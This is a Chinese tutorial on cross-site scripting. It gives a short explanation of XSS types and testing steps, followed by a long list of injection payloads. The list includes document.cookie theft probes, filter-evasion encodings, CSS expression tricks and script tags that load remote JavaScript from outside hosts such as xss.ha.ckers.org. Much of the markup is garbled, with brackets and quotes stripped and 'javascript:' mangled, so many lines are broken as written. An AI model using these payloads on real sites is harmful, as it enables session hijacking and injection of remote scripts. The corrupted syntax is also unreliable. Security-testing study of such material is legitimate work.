安全测试|XSS攻击实例

发布时间:2026/7/16 16:20:36
安全测试|XSS攻击实例 XSS全称是Cross Site Scripting即跨站脚本当目标网站目标用户浏览器渲染HTML文档的过程中出现了不被预期的脚本指令并执行时XSS就发生了。1XSS攻击原理XSS攻击通常指的是通过利用 网页 开发时留下的漏洞通过巧妙的方法注入恶意指令代码到网页使用户加载并执行攻击者恶意制造的网页程序。 这些恶意网页程序通常是JavaScript但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后攻击者可能得到包括但不限于更高的权限如执行一些操作、私密网页内容、会话和cookie等各种内容。2XSS能做什么窃取用户Cookie后台增删改文章XSS钓鱼攻击利用XSS漏洞进行传播和修改网页代码XSS蠕虫攻击网站重定向获取键盘记录获取用户信息等3XSS攻击分类第一种反射型页面仅把用户输入直接回显在页面或源码中需要诱使用户点击才能成功。第二种持久型XSS 攻击代码会被存储在服务器中由于用户可能会主动浏览被攻击页面此种方法危害较大。第三种DOM 型( DOM Based XSS )通过修改页面的 DOM 节点形成 XSS严格来讲也可划为反射型 XSS。4XSS三种途径第一种对普通的用户输入页面原样输出用户通过对JSCODE的伪装经过一些操作就会跳出一个木马界面取得登录用户的Cookie.第二种在代码区里有用户输入的内容原则就是代码区中绝对不应含有用户输入的东西。第三种允许用户输入HTML标签的页面。用户可以提交一些自定义的HTML代码这种情况是最危险的。因为IE浏览器默认采用的是UNICODE编码HTML编码可以用#ASCII方式来写又可以使用”/”连接16进制字符串来写使得过滤变得异常复杂如下面的四个例子都可以在IE中运行。5XSS攻击常见case1scriptalert(XSS)/script //简单弹框 2ScRiPtAlErt(XSS)/ScRiPt //过滤了大小 3img src# onerroralert(XSS) //img 标签 进行绕过 4javascript:alert(xss) //使用 Javascript 的尾协议 5 onclick alert(xss) //利用 href 属性值来进行xss6XSS测试方法1)查看代码查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单以及cookie. 例如在ASP的程序中通过Request对象获取客户端的变量​​​​​​​% strUserCode Request.QueryString(“code”); strUser Request.Form(“USER”); strID Request.Cookies(“ID”); %假如变量没有经过htmlEncode处理 那么这个变量就存在一个XSS漏洞2)准备测试脚本​​​​​​​/scriptalert(document.cookie)/script!-- scriptalert(document.cookie)/script!-- onclickalert(document.cookie)在网页中的Textbox或者其他能输入数据的地方输入这些测试脚本 看能不能弹出对话框能弹出的话说明存在XSS漏洞;在URL中查看有那些变量通过URL把值传给Web服务器 把这些变量的值退换成我们的测试的脚本, 然后看我们的脚本是否能执行。7 XSS注入常用语句​​​​​​​scriptalert(hellogaga!);/script //经典语句 img srcjavascript.:alert(XSS) scriptalert(XSS)/script table backgroundjavascript.:alert(([code])/table object typetext/html datajavascript.:alert(([code]);/object alert(XSS) scriptalert(document.cookie)/script scriptalert(document.cookie)/script scriptalert(document.cookie)/script scriptalert(vulnerable)/script s#99;riptalert(XSS)/script img srcjavas#99;ript:alert(XSS) %0a%0ascriptalert(\Vulnerable\)/script.jsp %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html scriptalert(Vulnerable)/script a.jsp/scriptalert(Vulnerable)/script scriptalert(Vulnerable)/script IMG SRCjavascript.:alert(XSS); IMG src/javascript.:alert(XSS) IMG src/JaVaScRiPt.:alert(XSS) IMG src/JaVaScRiPt.:alert(quot;XSSquot;) IMG SRCjav#x09;ascript.:alert(XSS); IMG SRCjav#x0A;ascript.:alert(XSS); IMG SRCjav#x0D;ascript.:alert(XSS); IMG src/java\0script.:alert(\XSS\);out IMG SRC javascript.:alert(XSS); SCRIPTa/XSS/alert(a.source)/SCRIPT BODY BACKGROUNDjavascript.:alert(XSS) BODY ONLOADalert(XSS) IMG DYNSRCjavascript.:alert(XSS) IMG LOWSRCjavascript.:alert(XSS) BGSOUND SRCjavascript.:alert(XSS); br size{alert(XSS)} LAYER SRChttp://xss.ha.ckers.org/a.js/layer LINK RELstylesheetHREFjavascript.:alert(XSS); IMG SRCvbscript.:msgbox(XSS) META. HTTP-EQUIVrefreshCONTENT0;urljavascript.:alert(XSS); IFRAME. src/javascript.:alert(XSS)/IFRAME FRAMESETFRAME. src/javascript.:alert(XSS)/FRAME/FRAMESET TABLE BACKGROUNDjavascript.:alert(XSS) DIV STYLEbackground-image: url(javascript.:alert(XSS)) DIV STYLEbehaviour: url(http://www.how-to-hack.org/exploit.html#39;); DIV STYLEwidth: expression(alert(XSS)); STYLEim\port\ja\vasc\ript:alert(XSS);/STYLE IMG STYLExss:expre\ssion(alert(XSS)) STYLE. TYPEtext/javascriptalert(XSS);/STYLE STYLE. TYPEtext/css.XSS{background-image:url(javascript.:alert(XSS));}/STYLEA CLASSXSS/A STYLE. typetext/cssBODY{background:url(javascript.:alert(XSS))}/STYLE BASE HREFjavascript.:alert(XSS);// getURL(javascript.:alert(XSS)) aget;bURL;cjavascript.:;dalert(XSS);;eval(abcd); XML SRCjavascript.:alert(XSS); BODY NLOADa();SCRIPTfunction a(){alert(XSS);}/SCRIPT SCRIPT. SRChttp://xss.ha.ckers.org/xss.jpg/SCRIPT IMG SRCjavascript.:alert(XSS) SCRIPT. aSRChttp://xss.ha.ckers.org/a.js/SCRIPT SCRIPT.SRChttp://xss.ha.ckers.org/a.js/SCRIPT SCRIPT. aSRChttp://xss.ha.ckers.org/a.js/SCRIPT SCRIPT.aSRChttp://xss.ha.ckers.org/a.js/SCRIPT SCRIPTdocument.write(SCRI);/SCRIPTPTSRChttp://xss.ha.ckers.org/a.js/SCRIPT A HREFhttp://www.gohttp://www.google.com/ogle.com/link/A